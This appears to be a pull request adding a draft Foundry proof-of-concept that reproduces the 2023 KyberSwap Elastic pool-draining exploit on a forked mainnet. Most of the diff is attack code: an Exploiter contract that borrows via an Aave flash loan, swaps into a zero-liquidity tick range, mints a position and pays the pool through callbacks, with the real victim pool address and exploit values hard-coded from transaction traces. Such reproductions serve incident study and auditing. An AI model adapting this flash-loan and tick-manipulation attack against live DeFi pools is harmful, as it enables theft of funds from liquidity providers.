+        emit log_named_decimal_uint(logTag(stage_label, token_label, target_label), IERC20(token).balanceOf(target), IERC20(token).decimals());
+    }
+}
+
+contract HelperContract {
+    function executeOperation(address asset, uint256 amount, uint256 premium, address initiator, bytes memory params) external returns (bool) {
+        // approve
+    }
+}
+
+contract KyberswapExploit is Logger {
+    string private constant chain = "mainnet";
+    uint256 private constant block = 18_630_391;
+    address private constant victim = address(0xFd7B111AA83b9b6F547E617C7601EfD997F64703);
+    address private constant lender = address(0x87870Bca3F3fD6335C3F4ce8392D69350B4fA4E2);
+    uint256 private constant amount = 0x6c6b935b8bbd400000; // 2,000,000,000,000,000,000,000
+    address private attacker = address(this);
+    address private helper = address(0);
+    address private token0 = address(0);
+    address private token1 = address(0);
+
+    function setUp() public {
+        vm.createSelectFork(chain, block);
+        token0 = address(IPoolKyberswap(victim).token0());
+        token1 = address(IPoolKyberswap(victim).token1());
+        helper = address(new HelperContract());
+        vm.label(victim, "KS2-RT");
+        vm.label(lender, "Aave: Pool V3");
+        vm.label(token0, "frxETH");
+        vm.label(token1, "WETH");
+    }
+
+    function testExploit() public {
+        // create the exploit contract
+
+        // fund the attacker
+        deal(address(token0), attacker, 200e18);
+
+        // log pre-exploit
+        logBalances("before", "token0", "victim", victim, token0);
+        logBalances("before", "token1", "victim", victim, token1);
+        logBalances("before", "token0", "attacker", attacker, token0);
+        logBalances("before", "token1", "attacker", attacker, token1);
+
+        // log post-exploit
+        logBalances("after", "token0", "victim", victim, token0);
+        logBalances("after", "token1", "victim", victim, token1);
+        logBalances("after", "token0", "attacker", attacker, token0);
+        logBalances("after", "token1", "attacker", attacker, token1);
+    }
+}

--- a/src/test/KyberSwap_exp.eth.1.sol
+++ b/src/test/KyberSwap_exp.eth.1.sol
@@ -5,7 +5,7 @@ import "forge-std/Test.sol";
 import "./interface.sol";
 
 // @KeyInfo - Total Lost : ~$46M
-// Attacker EOA: https://etherscan.io/address/0x50275e0b7261559ce1644014d4b78d4aa63be836
+// Attacker EOA: https://etherscan.io/address/0x50275E0B7261559cE1644014d4b78D4AA63BE836
 // Attacker Contracts : https://etherscan.io/address/0xaf2acf3d4ab78e4c702256d214a3189a874cdc13
 // Vulnerable Contract : https://etherscan.io/address/0xFd7B111AA83b9b6F547E617C7601EfD997F64703
 // Transaction : https://phalcon.blocksec.com/explorer/tx/eth/0x485e08dc2b6a4b3aeadcb89c3d18a37666dc7d9424961a2091d6b3696792f0f3 (block 18630392)
@@ -16,6 +16,8 @@ import "./interface.sol";
 // https://blocksec.com/blog/yet-another-tragedy-of-precision-loss-an-in-depth-analysis-of-the-kyber-swap-incident-1
 // https://blog.solidityscan.com/kyberswap-hack-analysis-25e25f2e4a7b
 // https://slowmist.medium.com/a-deep-dive-into-the-kyberswap-hack-3e13f3305d3a
+
+// INTERFACES /////////////////////////////////////////////////////////////////
 
 interface IPoolStorage {
     function token0() external view returns (IERC20);
@@ -37,69 +39,141 @@ interface IPoolActions {
     function swap(address recipient, int256 swapQty, bool isToken0, uint160 limitSqrtP, bytes memory data) external returns (int256 qty0, int256 qty1);
 }
 
-interface IPoolKyberswap is IPoolActions, IPoolStorage {}
+interface IKyberswapPool is IPoolActions, IPoolStorage {}
 
-interface IPoolAave {
+interface IAavePool {
     function flashLoanSimple(address receiverAddress, address asset, uint256 amount, bytes memory params, uint16 referralCode) external;
 }
 
+interface IUniswapV3Pool {
+    function swap(address recipient, bool zeroForOne, int256 amountSpecified, uint160 sqrtPriceLimitX96, bytes calldata data) external returns (int256 amount0, int256 amount1);
+}
+
+// LOGGING ////////////////////////////////////////////////////////////////////
+
 contract Logger is Test {
-    function logTag(string memory stage, string memory token, string memory label) public returns (string memory) {
+    function logTag(string memory stage, string memory token, string memory label) internal returns (string memory) {
         string memory text_stage = string(abi.encodePacked(" [ ", stage, " ] "));
         string memory text_token = string(abi.encodePacked(" [ ", token, " ] "));
         string memory text_label = string(abi.encodePacked(" [ ", label, " ] "));
         return string(abi.encodePacked(text_stage, text_token, text_label));
     }
 
-    function logBalances(string memory stage_label, string memory token_label, string memory target_label, address target, address token) public {
+    function logBalances(string memory stage_label, string memory token_label, string memory target_label, address target, address token) internal {
         emit log_named_decimal_uint(logTag(stage_label, token_label, target_label), IERC20(token).balanceOf(target), IERC20(token).decimals());
     }
 }
 
-contract HelperContract {
-    function executeOperation(address asset, uint256 amount, uint256 premium, address initiator, bytes memory params) external returns (bool) {
+// CORE LOGIC /////////////////////////////////////////////////////////////////
+
+contract Exploiter is Test {
+    address public _attacker = address(0);
+    address public _victim = address(0);
+    address public _lender = address(0);
+    address public _token0 = address(0);
+    address public _token1 = address(0);
+    uint256 public _amount = 0;
+
+    constructor(address victim, address lender, uint256 amount) {
+        _attacker = address(this);
+        _victim = victim;
+        _lender = lender;
+        _token0 = address(IKyberswapPool(_victim).token0());
+        _token1 = address(IKyberswapPool(_victim).token1());
+        _amount = amount;
+    }
+
+    // entry point ////////////////////////////////////////////////////////////
+    function trigger() public returns (bool) {
+        IAavePool(_lender).flashLoanSimple(address(this), _token1, _amount, "", 0);
+
+        return true;
+    }
+
+    // core ///////////////////////////////////////////////////////////////////
+    function _flashCallback(uint256 due) internal returns (bool) {
+        int256 __delta_0;
+        int256 __delta_1;
+
+        // anti-snipping?
+        IERC20(_token0).approve(address(0xe222fBE074A436145b255442D919E4E3A6c6a480), 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff);
+        IERC20(_token1).approve(address(0xe222fBE074A436145b255442D919E4E3A6c6a480), 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff);
+
+        // swap
+        (__delta_0, __delta_1) = IKyberswapPool(_victim).swap(_attacker, int256(_amount), false, 0x100000000000000000000000000, "");
+        emit log_named_int("d0", __delta_0);
+        emit log_named_int("d1", __delta_1);
+
+        // calculations
+        IKyberswapPool(_victim).tickDistance();
+        IKyberswapPool(_victim).swapFeeUnits();
+        IKyberswapPool(_victim).getPoolState();
+        IKyberswapPool(_victim).getLiquidityState();
+
         // approve
+        IERC20(_token1).approve(_lender, due);
+
+        return true;
+    }
+
+    // swap / tick manipulation ///////////////////////////////////////////////
+    function swapCallback(int256 deltaQty0, int256 deltaQty1, bytes calldata data) external {
+        if (deltaQty0 > 0) {
+            IERC20(_token0).transfer(msg.sender, uint256(deltaQty0));
+        } else if (deltaQty1 > 0) {
+            IERC20(_token1).transfer(msg.sender, uint256(deltaQty1));
+        }
+    }
+
+    // flash loan / funding callbacks /////////////////////////////////////////
+
+    // Aave
+    function executeOperation(address asset, uint256 amount, uint256 premium, address initiator, bytes memory params) external returns (bool) {
+        return _flashCallback(amount + premium);
+    }
+
+    // Uniswap v3
+    function uniswapV3FlashCallback(uint256 fee0, uint256 fee1, bytes calldata data) external {
+        _flashCallback(fee1);
     }
 }
 
-contract KyberswapExploit is Logger {
-    string private constant chain = "mainnet";
-    uint256 private constant block = 18_630_391;
-    address private constant victim = address(0xFd7B111AA83b9b6F547E617C7601EfD997F64703);
-    address private constant lender = address(0x87870Bca3F3fD6335C3F4ce8392D69350B4fA4E2);
-    uint256 private constant amount = 0x6c6b935b8bbd400000; // 2,000,000,000,000,000,000,000
-    address private attacker = address(this);
-    address private helper = address(0);
-    address private token0 = address(0);
-    address private token1 = address(0);
+// frxETH <=> WETH POOL EXPLOIT ///////////////////////////////////////////////
+
+contract KyberswapFrxEthWethPoolExploit is Exploiter, Logger {
+    string private constant _chain = "mainnet";
+    uint256 private constant _block = 18_630_391;
+
+    // victim = KS2-RT, lender = Aave pool v3, amount = 2,000,000,000,000,000,000,000
+    constructor() Exploiter(address(0xFd7B111AA83b9b6F547E617C7601EfD997F64703), address(0x87870Bca3F3fD6335C3F4ce8392D69350B4fA4E2), 0x6c6b935b8bbd400000) Logger() {}
 
     function setUp() public {
-        vm.createSelectFork(chain, block);
-        token0 = address(IPoolKyberswap(victim).token0());
-        token1 = address(IPoolKyberswap(victim).token1());
-        helper = address(new HelperContract());
-        vm.label(victim, "KS2-RT");
-        vm.label(lender, "Aave: Pool V3");
-        vm.label(token0, "frxETH");
-        vm.label(token1, "WETH");
+        vm.createSelectFork(_chain, _block);
+        vm.label(_victim, "KS2-RT");
+        vm.label(_lender, "Aave: Pool V3");
+        vm.label(_token0, "frxETH");
+        vm.label(_token1, "WETH");
     }
 
     function testExploit() public {
         // create the exploit contract
 
         // fund the attacker
-        deal(address(token0), attacker, 200e18);
+        deal(_token1, _attacker, 200e18);
 
         // log pre-exploit
-        logBalances("before", "token0", "victim", victim, token0);
-        logBalances("before", "token1", "victim", victim, token1);
-        logBalances("before", "token0", "attacker", attacker, token0);
-        logBalances("before", "token1", "attacker", attacker, token1);
+        logBalances("before", "token0", "victim", _victim, _token0);
+        logBalances("before", "token1", "victim", _victim, _token1);
+        logBalances("before", "token0", "attacker", _attacker, _token0);
+        logBalances("before", "token1", "attacker", _attacker, _token1);
+
+        // main
+        trigger();
 
         // log post-exploit
-        logBalances("after", "token0", "victim", victim, token0);
-        logBalances("after", "token1", "victim", victim, token1);
-        logBalances("after", "token0", "attacker", attacker, token0);
-        logBalances("after", "token1", "attacker", attacker, token1);
+        logBalances("after", "token0", "victim", _victim, _token0);
+        logBalances("after", "token1", "victim", _victim, _token1);
+        logBalances("after", "token0", "attacker", _attacker, _token0);
+        logBalances("after", "token1", "attacker", _attacker, _token1);
     }
 }

--- a/src/test/KyberSwap_exp.eth.1.sol
+++ b/src/test/KyberSwap_exp.eth.1.sol
@@ -68,10 +68,8 @@ contract Exploiter is Test {
     }
 
     // entry point ////////////////////////////////////////////////////////////
-    function trigger() public returns (bool) {
+    function trigger() public {
         IAavePool(_lender).flashLoanSimple(address(this), _token1, _amount, "", 0);
-
-        return true;
     }
 
     // core ///////////////////////////////////////////////////////////////////
@@ -82,14 +80,15 @@ contract Exploiter is Test {
         uint160 __sqrtP;
         uint256 __token_id;
 
+        // settings
+        __swap_fee = IKyberswapPool(_victim).swapFeeUnits(); // 10
+
         // approval is required to mint the position
         IERC20(_token0).approve(_manager, 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff);
         IERC20(_token1).approve(_manager, 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff);
 
         // step 1: move to a tick range with 0 liquidity
         IKyberswapPool(_victim).swap(_attacker, int256(_amount), false, 0x100000000000000000000000000, "");
-
-        __swap_fee = IKyberswapPool(_victim).swapFeeUnits(); // 10
         
         // step 2: supply liquidity
         (__sqrtP, __currentTick, __nearestCurrentTick,) = IKyberswapPool(_victim).getPoolState();


### PR DESCRIPTION
Hey there, here's a draft for the hack of Kyberswap elastic at the end of 2023.

It is the first exploit of the chain of pool draining, in transaction [0x485e08dc2b6a4b3aeadcb89c3d18a37666dc7d9424961a2091d6b3696792f0f3](https://phalcon.blocksec.com/explorer/tx/eth/0x485e08dc2b6a4b3aeadcb89c3d18a37666dc7d9424961a2091d6b3696792f0f3?line=29).

There were actually dozens of pool drainings, following the same pattern.
Is it ok to include only this particular hack?

Also the hack is quite sophisticated (for me >>): it relies on precise calculations / values.
For now I have mostly hard-coded those from the traces.

It doesn't show how the hacker came up with those specific values though, should I go further and reverse the process?